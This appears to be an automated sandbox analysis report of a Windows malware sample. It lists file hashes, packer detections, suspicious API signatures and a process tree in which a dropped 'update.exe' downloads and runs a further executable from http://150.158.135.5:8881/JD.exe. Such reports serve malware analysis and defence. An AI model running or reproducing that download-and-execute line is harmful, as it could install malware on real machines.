Analysis
-
max time kernel
120s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
11/10/2023, 07:19
Static task
static1
Behavioral task
behavioral1
Sample
e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe
Resource
win10v2004-20230915-en
General
-
Target
e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe
-
Size
8.5MB
-
MD5
4c046d8fcd68b308e6361c49579d3dd4
-
SHA1
e595aa98843684e494a3edb9a58d86508f1d81a3
-
SHA256
e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df
-
SHA512
c4c60b60e387407c0626931b07c608f44fddd6411b9a578f9ba13b26321972db323e26b5c36846ab854ac75c892325f157aa073a8bf00514a2d937e36a5da504
-
SSDEEP
196608:M7xiyjnEtXw/K7W0yVLrS4riDVmv7H0X7FEk:Ajn2g/KktrHWVmv7H0XREk
Malware Config
Signatures
-
Downloads MZ/PE file
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral1/files/0x0032000000015604-13.dat acprotect behavioral1/files/0x0032000000015604-16.dat acprotect -
Executes dropped EXE 2 IoCs
pid Process 3060 update.exe 1992 JDÉÏ´«1.7.exe -
Loads dropped DLL 10 IoCs
pid Process 328 e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe 3060 update.exe 3060 update.exe 3060 update.exe 3060 update.exe 3060 update.exe 3060 update.exe 1992 JDÉÏ´«1.7.exe 1992 JDÉÏ´«1.7.exe 1992 JDÉÏ´«1.7.exe -
resource yara_rule behavioral1/files/0x0032000000015604-13.dat upx behavioral1/memory/3060-15-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/files/0x0032000000015604-16.dat upx behavioral1/memory/3060-17-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-38-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-40-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-42-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-43-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-44-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-48-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-52-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-54-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-58-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-68-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-66-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-70-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-72-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-76-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-78-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-80-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-82-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-84-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-74-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-64-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-62-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-60-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-56-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-50-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-46-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-41-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral1/memory/1992-85-0x0000000010000000-0x000000001003E000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3060 update.exe 3060 update.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 328 e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe 328 e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe 3060 update.exe 3060 update.exe 3060 update.exe 1992 JDÉÏ´«1.7.exe 1992 JDÉÏ´«1.7.exe 1992 JDÉÏ´«1.7.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 328 wrote to memory of 3060 328 e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe 28 PID 328 wrote to memory of 3060 328 e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe 28 PID 328 wrote to memory of 3060 328 e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe 28 PID 328 wrote to memory of 3060 328 e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe 28 PID 328 wrote to memory of 3060 328 e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe 28 PID 328 wrote to memory of 3060 328 e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe 28 PID 328 wrote to memory of 3060 328 e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe 28 PID 3060 wrote to memory of 1992 3060 update.exe 33 PID 3060 wrote to memory of 1992 3060 update.exe 33 PID 3060 wrote to memory of 1992 3060 update.exe 33 PID 3060 wrote to memory of 1992 3060 update.exe 33 PID 3060 wrote to memory of 1992 3060 update.exe 33 PID 3060 wrote to memory of 1992 3060 update.exe 33 PID 3060 wrote to memory of 1992 3060 update.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe"C:\Users\Admin\AppData\Local\Temp\e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe"1⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:328 -
C:\Users\Admin\AppData\Local\Temp\update.exe"C:\Users\Admin\AppData\Local\Temp\update.exe" http://150.158.135.5:8881/JD.exe C:\Users\Admin\AppData\Local\Temp\JDÉÏ´«1.7.exe C:\Users\Admin\AppData\Local\Temp\e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Users\Admin\AppData\Local\Temp\JDÉÏ´«1.7.exeC:\Users\Admin\AppData\Local\Temp\JDÉÏ´«1.7.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:1992
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8.5MB
MD5d298c261325c71832c727eccbc6a26d3
SHA1b4d1be68ae8ec0e38423b6654e658b396fd9d318
SHA256f642448a8b22017caa6808f83fddb9d1b4e6fea3ce85eb2201788895d0be349a
SHA5129773e4d6657d890faa192418d0f25e5c740e8e0a6572f5f3b2a70e800740a348e65dc9fe2e7f383745d4ca889e56613e4ac155b020d94e93d077466ac2c7b4aa
-
Filesize
8.5MB
MD5d298c261325c71832c727eccbc6a26d3
SHA1b4d1be68ae8ec0e38423b6654e658b396fd9d318
SHA256f642448a8b22017caa6808f83fddb9d1b4e6fea3ce85eb2201788895d0be349a
SHA5129773e4d6657d890faa192418d0f25e5c740e8e0a6572f5f3b2a70e800740a348e65dc9fe2e7f383745d4ca889e56613e4ac155b020d94e93d077466ac2c7b4aa
-
Filesize
8.5MB
MD5d298c261325c71832c727eccbc6a26d3
SHA1b4d1be68ae8ec0e38423b6654e658b396fd9d318
SHA256f642448a8b22017caa6808f83fddb9d1b4e6fea3ce85eb2201788895d0be349a
SHA5129773e4d6657d890faa192418d0f25e5c740e8e0a6572f5f3b2a70e800740a348e65dc9fe2e7f383745d4ca889e56613e4ac155b020d94e93d077466ac2c7b4aa
-
Filesize
86KB
MD5114054313070472cd1a6d7d28f7c5002
SHA19a044986e6101df1a126035da7326a50c3fe9a23
SHA256e15d9e1b772fed3db19e67b8d54533d1a2d46a37f8b12702a5892c6b886e9db1
SHA512a2ff8481e89698dae4a1c83404105093472e384d7a3debbd7014e010543e08efc8ebb3f67c8a4ce09029e6b2a8fb7779bb402aae7c9987e61389cd8a72c73522
-
Filesize
1.1MB
MD57fe065878aa934225097edc54afd4b58
SHA1bbdcb2041fd7f2bc5c38c6012623c120f3a55210
SHA256b251ca86d4180d0b36cfff2c94c8b7ed860badc3a0617a6b02faa14a25f61088
SHA512c78f7286fc451f21641a1b3198eb0d187591ac7453c1a1f74e387cd64326f7190a5edb2b488b56d75992bd9155df365c59fb756d9e73e13351a6c9a980fca109
-
Filesize
1.1MB
MD57fe065878aa934225097edc54afd4b58
SHA1bbdcb2041fd7f2bc5c38c6012623c120f3a55210
SHA256b251ca86d4180d0b36cfff2c94c8b7ed860badc3a0617a6b02faa14a25f61088
SHA512c78f7286fc451f21641a1b3198eb0d187591ac7453c1a1f74e387cd64326f7190a5edb2b488b56d75992bd9155df365c59fb756d9e73e13351a6c9a980fca109
-
Filesize
8.5MB
MD5d298c261325c71832c727eccbc6a26d3
SHA1b4d1be68ae8ec0e38423b6654e658b396fd9d318
SHA256f642448a8b22017caa6808f83fddb9d1b4e6fea3ce85eb2201788895d0be349a
SHA5129773e4d6657d890faa192418d0f25e5c740e8e0a6572f5f3b2a70e800740a348e65dc9fe2e7f383745d4ca889e56613e4ac155b020d94e93d077466ac2c7b4aa
-
Filesize
8.5MB
MD5d298c261325c71832c727eccbc6a26d3
SHA1b4d1be68ae8ec0e38423b6654e658b396fd9d318
SHA256f642448a8b22017caa6808f83fddb9d1b4e6fea3ce85eb2201788895d0be349a
SHA5129773e4d6657d890faa192418d0f25e5c740e8e0a6572f5f3b2a70e800740a348e65dc9fe2e7f383745d4ca889e56613e4ac155b020d94e93d077466ac2c7b4aa
-
Filesize
8.5MB
MD5d298c261325c71832c727eccbc6a26d3
SHA1b4d1be68ae8ec0e38423b6654e658b396fd9d318
SHA256f642448a8b22017caa6808f83fddb9d1b4e6fea3ce85eb2201788895d0be349a
SHA5129773e4d6657d890faa192418d0f25e5c740e8e0a6572f5f3b2a70e800740a348e65dc9fe2e7f383745d4ca889e56613e4ac155b020d94e93d077466ac2c7b4aa
-
Filesize
8.5MB
MD5d298c261325c71832c727eccbc6a26d3
SHA1b4d1be68ae8ec0e38423b6654e658b396fd9d318
SHA256f642448a8b22017caa6808f83fddb9d1b4e6fea3ce85eb2201788895d0be349a
SHA5129773e4d6657d890faa192418d0f25e5c740e8e0a6572f5f3b2a70e800740a348e65dc9fe2e7f383745d4ca889e56613e4ac155b020d94e93d077466ac2c7b4aa
-
Filesize
8.5MB
MD5d298c261325c71832c727eccbc6a26d3
SHA1b4d1be68ae8ec0e38423b6654e658b396fd9d318
SHA256f642448a8b22017caa6808f83fddb9d1b4e6fea3ce85eb2201788895d0be349a
SHA5129773e4d6657d890faa192418d0f25e5c740e8e0a6572f5f3b2a70e800740a348e65dc9fe2e7f383745d4ca889e56613e4ac155b020d94e93d077466ac2c7b4aa
-
Filesize
86KB
MD5114054313070472cd1a6d7d28f7c5002
SHA19a044986e6101df1a126035da7326a50c3fe9a23
SHA256e15d9e1b772fed3db19e67b8d54533d1a2d46a37f8b12702a5892c6b886e9db1
SHA512a2ff8481e89698dae4a1c83404105093472e384d7a3debbd7014e010543e08efc8ebb3f67c8a4ce09029e6b2a8fb7779bb402aae7c9987e61389cd8a72c73522
-
Filesize
1.1MB
MD57fe065878aa934225097edc54afd4b58
SHA1bbdcb2041fd7f2bc5c38c6012623c120f3a55210
SHA256b251ca86d4180d0b36cfff2c94c8b7ed860badc3a0617a6b02faa14a25f61088
SHA512c78f7286fc451f21641a1b3198eb0d187591ac7453c1a1f74e387cd64326f7190a5edb2b488b56d75992bd9155df365c59fb756d9e73e13351a6c9a980fca109
-
Filesize
1.1MB
MD57fe065878aa934225097edc54afd4b58
SHA1bbdcb2041fd7f2bc5c38c6012623c120f3a55210
SHA256b251ca86d4180d0b36cfff2c94c8b7ed860badc3a0617a6b02faa14a25f61088
SHA512c78f7286fc451f21641a1b3198eb0d187591ac7453c1a1f74e387cd64326f7190a5edb2b488b56d75992bd9155df365c59fb756d9e73e13351a6c9a980fca109
-
Filesize
1.1MB
MD57fe065878aa934225097edc54afd4b58
SHA1bbdcb2041fd7f2bc5c38c6012623c120f3a55210
SHA256b251ca86d4180d0b36cfff2c94c8b7ed860badc3a0617a6b02faa14a25f61088
SHA512c78f7286fc451f21641a1b3198eb0d187591ac7453c1a1f74e387cd64326f7190a5edb2b488b56d75992bd9155df365c59fb756d9e73e13351a6c9a980fca109
-
Filesize
1.1MB
MD57fe065878aa934225097edc54afd4b58
SHA1bbdcb2041fd7f2bc5c38c6012623c120f3a55210
SHA256b251ca86d4180d0b36cfff2c94c8b7ed860badc3a0617a6b02faa14a25f61088
SHA512c78f7286fc451f21641a1b3198eb0d187591ac7453c1a1f74e387cd64326f7190a5edb2b488b56d75992bd9155df365c59fb756d9e73e13351a6c9a980fca109